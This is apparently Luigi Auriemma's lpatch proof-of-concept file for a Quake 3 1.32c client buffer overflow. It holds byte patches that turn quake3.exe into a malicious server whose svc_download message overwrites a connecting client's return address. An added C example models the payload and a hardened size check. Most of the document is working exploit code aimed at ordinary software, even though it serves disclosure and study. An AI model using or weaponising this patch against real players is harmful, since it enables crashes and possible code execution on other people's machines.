====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step
# - launch lpatch.exe
# - select this q3cbof.lpatch file
# - read the message windows and click yes
# - select the quake3.exe file to patch
# - read the message windows to know if everything has been patched correctly
# - test your client using this malicious server executable

TITLE
q3cbof proof-of-concept for Quake 3 1.32c Windows 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

INTRO
Advisory:
.
.   http://aluigi.org/adv/q3cbof-adv.txt
.
This patch transforms a Windows Quake 3 1.32c executable into a proof-of-concept
for testing the above bug: any client that tries to connect to this server will
crash with the return address overwritten by 0x41414141.

FILE
quake3.exe

RVA
00400000

BYTES_ORIGINAL
; SV_SendClientGameState
; // send the gamestate
8D 44 24 34             ; lea eax, [esp+34]   (&msg)
6A 02                   ; push 2              (svc_gamestate)
50                      ; push eax            (&msg)
E8 BC 60 FF FF          ; call                (MSG_WriteByte)
8B 8E 04 04 01 00       ; mov ecx, [esi+10404]
51                      ; push ecx
8D 54 24 40             ; lea edx, [esp+40]   (&msg)
52                      ; push edx
E8 1B 61 FF FF          ; call                (MSG_WriteLong)
83 C4 3C                ; add esp, 3c
33 FF                   ; xor edi, edi        (start = 0)
8D 9B 00 00 00 00       ; lea ebx, [ebx+0]    (alignment nop)
8B 04 BD 44 56 96 00    ; mov eax, [edi*4+965644]  (sv.configstrings[start])
80 38 00                ; cmp byte [eax], 0
74 2C                   ; je  (skip empty configstring)
8D 4C 24 08             ; lea ecx, [esp+8]
6A 03                   ; push 3              (svc_configstring)
51                      ; push ecx
E8 88 60 FF FF          ; call                (MSG_WriteByte)
8D 54 24 10             ; lea edx, [esp+10]
57                      ; push edi            (start)
52                      ; push edx
E8 CD 60 FF FF          ; call                (MSG_WriteShort)
8B 04 BD 44 56 96 00    ; mov eax, [edi*4+965644]
50                      ; push eax
8D 4C 24 1C             ; lea ecx, [esp+1c]
51                      ; push ecx
E8 CB 61 FF FF          ; call                (MSG_WriteBigString)
83 C4 18                ; add esp, 18
47                      ; inc edi             (start++)
81 FF 00                ; cmp edi, ...
; ...
BYTES_PATCH
50                      ; *** use this stuff for pointing &msg to [esp+3c]
6a 06                   ; push svc_download
8D 44 24 3c 50          ; push &msg
e8 ^00423550            ; call MSG_WriteByte
6a ff                   ; push -1
8D 44 24 44 50          ; push &msg
e8 ^004235A0            ; call MSG_WriteShort
68 |00004020            ; push 16384 + 32
8D 44 24 4c 50          ; push &msg
e8 ^004235A0            ; call MSG_WriteShort
33 db                   ; for(i = 0;
6a 00                   ; push 0x00
8D 44 24 54 50          ; push &msg
e8 ^00423550            ; call MSG_WriteByte
58                      ; pop eax
58                      ; pop eax
43                      ; i++
81 fb |4000             ; i < 16384
7c e9
33 db                   ; for(i = 0;   // return address
6a 41                   ; push 'A'
8D 44 24 54 50          ; push &msg
e8 ^00423550            ; call MSG_WriteByte
58                      ; pop eax
58                      ; pop eax
43                      ; i++
81 fb |20               ; i < 32
7c e9
56                      ; push client
8D 44 24 54 50          ; push &msg
e8 ^004351B0            ; call SV_SendMessageToClient
83 c4 4c                ; free stack and return
58                      ; *** use this stuff for adjusting the stack
e9 ^0042D594
====================================================================================
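The following is an added example and is not part of Luigi Auriemma's q3cbof.lpatch or of the Quake 3 sources. It models, in plain C, what the patched SV_SendClientGameState emits (an svc_download block with block number -1, a declared size of 16384 + 32, 16384 zero bytes and 32 'A' bytes) and why a 1.32c client dies on it: the client copies `size` bytes into a fixed buffer without checking that they fit. The message is written raw here; the real engine Huffman-compresses the msg_t and wraps it in a netchan packet, so these bytes are the logical content, not what appears on the wire. The constant and function names (svc_download = 6, MAX_MSGLEN = 16384, the 16384-byte client buffer, the hardened check) are assumptions taken from the patch's comments and the public Quake 3 source, not from this file.

```c
/* Added example: model of the q3cbof svc_download payload and the client-side
 * size check it abuses. Not the author's or id Software's code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SVC_DOWNLOAD   6      /* svc_download, the opcode the patch pushes (assumption) */
#define MAX_MSGLEN     16384  /* size of the client's download chunk buffer (assumption) */
#define POC_PAD        16384  /* 0x00 bytes written by the patch's first loop */
#define POC_OVERWRITE  32     /* 'A' bytes written by the second loop */

static size_t write_byte(uint8_t *out, size_t off, int v) {
    out[off] = (uint8_t)v;                    /* MSG_WriteByte equivalent */
    return off + 1;
}
static size_t write_short(uint8_t *out, size_t off, int v) {
    out[off] = (uint8_t)(v & 0xff);           /* MSG_WriteShort is little-endian */
    out[off + 1] = (uint8_t)((v >> 8) & 0xff);
    return off + 2;
}
static int read_short(const uint8_t *p) {
    return (int16_t)(p[0] | (p[1] << 8));     /* sign-extends like MSG_ReadShort */
}

/* Build the block in exactly the order the patch's instruction stream does.
 * Returns the number of bytes written, or 0 if `cap` is too small. */
size_t build_poc_download(uint8_t *out, size_t cap) {
    size_t need = 1 + 2 + 2 + POC_PAD + POC_OVERWRITE, off = 0;
    if (cap < need) return 0;
    off = write_byte(out, off, SVC_DOWNLOAD);              /* push svc_download */
    off = write_short(out, off, -1);                       /* push -1 (block)   */
    off = write_short(out, off, POC_PAD + POC_OVERWRITE);  /* push 16384 + 32   */
    for (int i = 0; i < POC_PAD; i++)       off = write_byte(out, off, 0x00);
    for (int i = 0; i < POC_OVERWRITE; i++) off = write_byte(out, off, 'A');
    return off;
}

struct download_hdr { int block; int size; };

/* Parse the header the way a client does. Returns 0 on a well-formed header. */
int parse_download_hdr(const uint8_t *msg, size_t len, struct download_hdr *h) {
    if (len < 5 || msg[0] != SVC_DOWNLOAD) return -1;
    h->block = read_short(msg + 1);
    h->size  = read_short(msg + 3);
    return 0;
}

/* The unsafe pattern: trust `size` and copy into a MAX_MSGLEN byte buffer.
 * Instead of performing the overflowing copy, report how many bytes would
 * land past the end of that buffer (0 means it fits). */
int vulnerable_copy_overflow(const struct download_hdr *h) {
    return h->size > MAX_MSGLEN ? h->size - MAX_MSGLEN : 0;
}

/* Hardened check: refuse the chunk before any copy if it cannot fit. */
int hardened_accepts(const struct download_hdr *h) {
    return h->size >= 0 && h->size <= MAX_MSGLEN;
}

/* The dword a saved return address becomes when the tail of the payload
 * lands on it: any four bytes of the 32-byte 'A' run. */
uint32_t overwritten_retaddr(const uint8_t *msg, size_t len) {
    uint32_t v = 0;
    if (len < 4) return 0;
    memcpy(&v, msg + len - 4, 4);
    return v;
}

/* Wrappers that build, parse and evaluate the PoC message in one call. */
static uint8_t g_msg[5 + POC_PAD + POC_OVERWRITE];
static int poc_parse(struct download_hdr *h) {
    size_t len = build_poc_download(g_msg, sizeof g_msg);
    return len ? parse_download_hdr(g_msg, len, h) : -1;
}
int poc_size(void)      { struct download_hdr h; return poc_parse(&h) == 0 ? h.size : -1; }
int poc_block(void)     { struct download_hdr h; return poc_parse(&h) == 0 ? h.block : 0; }
int poc_overflow(void)  { struct download_hdr h; return poc_parse(&h) == 0 ? vulnerable_copy_overflow(&h) : -1; }
int poc_hardened(void)  { struct download_hdr h; return poc_parse(&h) == 0 ? hardened_accepts(&h) : -1; }
uint32_t poc_retaddr(void) {
    size_t len = build_poc_download(g_msg, sizeof g_msg);
    return overwritten_retaddr(g_msg, len);
}

int main(void) {
    printf("block=%d size=%d overflow=%d bytes hardened_accepts=%d retaddr=0x%08x\n",
           poc_block(), poc_size(), poc_overflow(), poc_hardened(), poc_retaddr());
    return 0;
}
```

The declared size 16384 + 32 is what makes the check matter: it is a valid positive short, so a parser that only rejects negative sizes still copies 32 bytes past a 16384-byte buffer, and the patch fills exactly those 32 bytes with 'A' so that whatever saved return address they reach reads 0x41414141.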